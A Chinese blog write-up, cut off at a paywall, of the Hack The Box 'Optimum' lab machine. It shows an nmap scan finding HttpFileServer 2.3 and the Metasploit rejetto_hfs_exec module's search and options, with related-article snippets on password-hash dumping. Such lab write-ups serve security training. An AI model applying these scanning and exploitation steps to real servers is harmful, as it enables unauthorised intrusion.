HTB Optimum[Hack The Box HTB靶场]writeup系列6

最新推荐文章于 2024-06-08 17:21:42 发布
最新推荐文章于 2024-06-08 17:21:42 发布
阅读量3k 收藏 1
点赞数
分类专栏: HTB靶场 文章标签: Hack The Box HTB Optimum
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/104174932
版权

这是HTB retire machine的第六台靶机

目录

0x00 靶机情况

0x01 信息搜集

端口扫描

检索应用

0x02 get webshell

0x03 提权

mfs中查找提权程序

执行systeminfo

执行windows-exploit-suggester.py

执行ms16-098

0x00 靶机情况

可以看到这台靶机是windows的靶机,难度值为容易。

0x01 信息搜集

端口扫描

root@kali:~# nmap -T5 -A -v 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-04 00:43 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating NSE at 00:43
Completed NSE at 00:43, 0.00s elapsed
Initiating Ping Scan at 00:43
Scanning 10.10.10.8 [4 ports]
Completed Ping Scan at 00:43, 0.55s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:43
Completed Parallel DNS resolution of 1 host. at 00:43, 0.27s elapsed
Initiating SYN Stealth Scan at 00:43
Scanning 10.10.10.8 [1000 ports]
Discovered open port 80/tcp on 10.10.10.8
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 12.03% done; ETC: 00:44 (0:01:13 remaining)
Increasing send delay for 10.10.10.8 from 0 to 5 due to 11 out of 21 dropped probes since last increase.
SYN Stealth Scan Timing: About 18.87% done; ETC: 00:46 (0:02:52 remaining)
SYN Stealth Scan Timing: About 24.80% done; ETC: 00:48 (0:03:32 remaining)
SYN Stealth Scan Timing: About 50.07% done; ETC: 00:49 (0:03:15 remaining)
SYN Stealth Scan Timing: About 56.67% done; ETC: 00:50 (0:02:55 remaining)
SYN Stealth Scan Timing: About 62.60% done; ETC: 00:50 (0:02:35 remaining)
SYN Stealth Scan Timing: About 68.80% done; ETC: 00:50 (0:02:12 remaining)
SYN Stealth Scan Timing: About 74.67% done; ETC: 00:50 (0:01:49 remaining)
SYN Stealth Scan Timing: About 80.63% done; ETC: 00:50 (0:01:25 remaining)
SYN Stealth Scan Timing: About 86.60% done; ETC: 00:50 (0:00:59 remaining)
SYN Stealth Scan Timing: About 92.57% done; ETC: 00:50 (0:00:33 remaining)
Completed SYN Stealth Scan at 00:50, 451.02s elapsed (1000 total ports)
Initiating Service scan at 00:50
Scanning 1 service on 10.10.10.8
Completed Service scan at 00:50, 7.08s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.8
Retrying OS detection (try #2) against 10.10.10.8
Initiating Traceroute at 00:51
Completed Traceroute at 00:51, 0.35s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:51
Completed Parallel DNS resolution of 2 hosts. at 00:51, 0.27s elapsed
NSE: Script scanning 10.10.10.8.
Initiating NSE at 00:51
Completed NSE at 00:51, 8.54s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 2.41s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Nmap scan report for 10.10.10.8
Host is up (0.33s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.010 days (since Tue Feb  4 00:37:15 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   339.56 ms 10.10.14.1
2   341.07 ms 10.10.10.8

NSE: Script Post-scanning.
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Initiating NSE at 00:51
Completed NSE at 00:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 486.38 seconds
           Raw packets sent: 3354 (152.624KB) | Rcvd: 384 (26.969KB)

 可以看到只开了一个端口80。

检索应用

打开主页看下:

我们看到主页上已经说明了开启了的应用为HFS V2.3。

那我们直接就搜索一下漏洞:

msf5 exploit(windows/http/rejetto_hfs_exec) > search hfs

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

看到确实有存在一个可以使用的漏洞

0x02 get webshell

设置相关的参数之后,执行漏洞利用模块

msf5 exploit(windows/http/rejetto_hfs_exec) > show options 

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.8       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0
最低0.47元/天 解锁文章
3riC5r
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HTB Beep[Hack The Box HTB靶场]writeup系列5
重新启程
02-04 3502
本题是retire机器的第五台了 目录 0x00 靶场信息 0x01 信息搜集 0x02 业务探测 80端口主页:elastix freepbx 80端口mail业务:roundcube webmail 10000端口:webmin 0x03 漏洞分析 elastix roundcube webmin 0x03 web攻击 roundcube webmin elas...
Python安装xlrd教程及报错解决方案
想做测开的点工
07-22 1万+
方法一:打开pycharm,点击Terminal 点击后输入:pip install xlrd 或者win+R 输入cmd 如果有ValueError: check_hostname requires server_hostname报错, 则可能是开了代理(比如Charles、Fiddler),关闭后即可安装成功 若import时还是无法引用,则用此命令重新安装python -m pip install --upgrade pip ...
python安装xlrd模块】
康的博客
07-12 1万+
xlrd模块安装
HackTheBox(黑客盒子)基础模块速通Responder篇
最新发布
轻舟已过万重山
06-08 1289
Responder是HackTheBox平台上的一个基础模块,用于嗅探网络中的NTLMv1/v2认证请求,并进行中间人攻击。本篇文章将介绍Responder的基本用法和一些常用技巧。
《Nmap渗透测试指南》—第2章2.7节UDP Ping扫描
weixin_33843947的博客
05-02 419
本节书摘来自异步社区《Nmap渗透测试指南》一书中的第2章2.7节UDP Ping扫描,作者 商广明,更多章节内容可以访问云栖社区“异步社区”公众号查看。 2.7 UDP Ping扫描表2.6所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——UDP Ping扫描。 -PU选项是发送一个空的UDP报文到指定端口。如果不指定端口则默...
python安装xlrd总是失败_python3.5 安装 xlrd包都不成功
weixin_39612220的博客
01-29 1128
报错:pythonPermissionError: [Errno 13] Permission denied: '/usr/local/lib/python3.5/dist-packages/xlrd-1.2.0.dist-info'bootstrapStoring debug log for failure in /home/shiyanlou/.pip/pip.logcurl1.pip命令的使...
Nmap命令详解
吃四碗饭的嘤嘤怪的博客
07-14 1万+
NMAP命令用法 nmap [Scan Type(s)] [Options] {target specification} Linux下安装NMAP yum install nmap sudo apt-get install nmap 用主机名和IP地址扫描系统 Nmap工具提供各种方法来扫描系统。在这个例子中,使用主机名和IP来扫描系统找出该系统上所有开放的端口,服务和MAC地址。 用主机名扫描系统 [root@localhost zzf]# nmap www.baidu.com S
vagrant-htbHackTheBox的Vagrantfile
03-01
流浪汉 Kali流浪者设置(最低) 安装工具 vim 网络工具 python3 解压缩 多路复用器 纳帕 网页壳 ...如果要添加更多,只需编辑Provision / kali.yml文件。...再一次,g,如果您想添加更多,只需将git repo...cd vagrant-htb
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBoxHTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
hackthebox:HTB 机器和 InfoSec 社区的笔记
08-04
黑盒子 HTB机注意事项将定期更新,旨在解开所有可能的方式并准备考试还有更多待更新创建和维护: cyberwr3nch内容向无国界医生说不!这个不断地从5月3日更新RD 2020感谢造访菜鸟cyberwr3nch :wrench: TCSC Learn and...
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois ...
★Kali信息收集★8.Nmap :端口扫描
weixin_33751566的博客
12-25 848
  ★Kali信息收集~ 0.Httrack 网站复制机   http://www.cnblogs.com/dunitian/p/5061954.html   ★Kali信息收集~ 1.Google Hacking + Github Hacking http://www.cnblogs.com/dunitian/p/5074765.html   ★Kali信息收集~2.Whois...
nmap
weixin_30315435的博客
03-27 103
root@bt:~# nmap -v -A 172.16.40.49 Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-27 05:50 EDTNSE: Loaded 93 scripts for scanning.NSE: Script Pre-scanning.Initiating Ping Scan at 05:50Scanning 172...
ubuntu下python2.7 安装 xlrd、xlwt、pip、 第三方库(library)的简易方法、pip 安装 selenium
热门推荐
韩世雷 程序员专栏
02-28 2万+
安装个easy_install工具 sudo apt-get install python-setuptools 然后sudo就OK了 比如Ubuntu下Python读写excel库 sudo easy_install xlrd sudo easy_install xlwt sudo easy_install xlutils
内网渗透拿掉shell后提升权限的几个小思路--洪水猛兽
weixin_42665738的博客
09-09 1555
成功上传webshell后提升权限的几个小思路 思路一:想办法获得Administrator密码 使用getpass直接获取并破解密码: 如果getpass被查杀,可以使用PwDump7.exe或者QuarksPwDump.exe得到密码的NTML哈希值,然后再去各种MD5网站解密。 如果得到密码的NTML哈希无法破解,可以采用彩虹表爆破的方式,爆破出Administrator的密码:保存扫描出的NTML哈希值->使用ophcrack(去官网下载字典库https://ophcrack.so
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6603
Hack The Box,一款有意思的渗透测试平台
HTB靶场 Shared
weixin_45682839的博客
08-22 2112
HTB靶场shared靶机通关攻略记录,涉及知识点包括:端口服务扫描、sql注入(cookie)、linux提权(ipython越权漏洞、redis逃逸漏洞)
hackthebox
09-11
Hack The Box (HTB) 是一个在线的渗透测试和网络安全训练平台。它提供了一系列虚拟机,供用户尝试攻击和入侵。用户可以通过解决一系列的密码学、网络、应用程序等挑战来增强他们的渗透测试技能。HTB 的目标是帮助...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值